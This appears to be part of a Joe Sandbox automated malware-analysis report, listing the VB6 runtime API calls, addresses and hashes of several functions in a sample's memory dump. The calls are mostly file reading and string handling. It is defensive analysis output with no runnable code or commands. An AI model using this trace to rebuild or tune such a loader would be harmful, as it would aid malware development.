                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                            • String ID: PR$ SE$4
                                                                                                                                                            • API String ID: 3576955720-2816282373
                                                                                                                                                            • Opcode ID: 058ab15efcf3795bcaaf05ff51ece3fbc155b1467b198e57c7543b98bf17ede9
                                                                                                                                                            • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                            • Opcode Fuzzy Hash: 058ab15efcf3795bcaaf05ff51ece3fbc155b1467b198e57c7543b98bf17ede9
                                                                                                                                                            • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                            Function 00419150 Relevance: 73.9, APIs: 49, Instructions: 362COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004191A8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?,?), ref: 004191F4
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0041922B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0041928D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,?), ref: 004192A6
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B1A0,?), ref: 004192F5
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004192FE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,0041B1A4,?), ref: 0041931C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B110,?), ref: 0041932C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,?), ref: 00419379
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,?,00000000), ref: 00419396
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3049632819-0
                                                                                                                                                            • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                            • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                            Function 00415D30 Relevance: 64.8, APIs: 43, Instructions: 350COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A21A08,00000000,72A26C4A), ref: 00415DA5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                            • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                              • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2812220623-0
                                                                                                                                                            • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                            • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                            Function 004128B0 Relevance: 61.7, APIs: 41, Instructions: 214COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412ACD
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 277344030-0
                                                                                                                                                            • Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
                                                                                                                                                            • Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58
                                                                                                                                                            Function 0040EAB0 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                            • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                            • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                            • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                            • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                            • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                            • String ID: gfff$gfff
                                                                                                                                                            • API String ID: 2397813863-3084402119
                                                                                                                                                            • Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
                                                                                                                                                            • Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94
                                                                                                                                                            Function 004125A0 Relevance: 54.2, APIs: 36, Instructions: 195COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,?), ref: 004125BE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
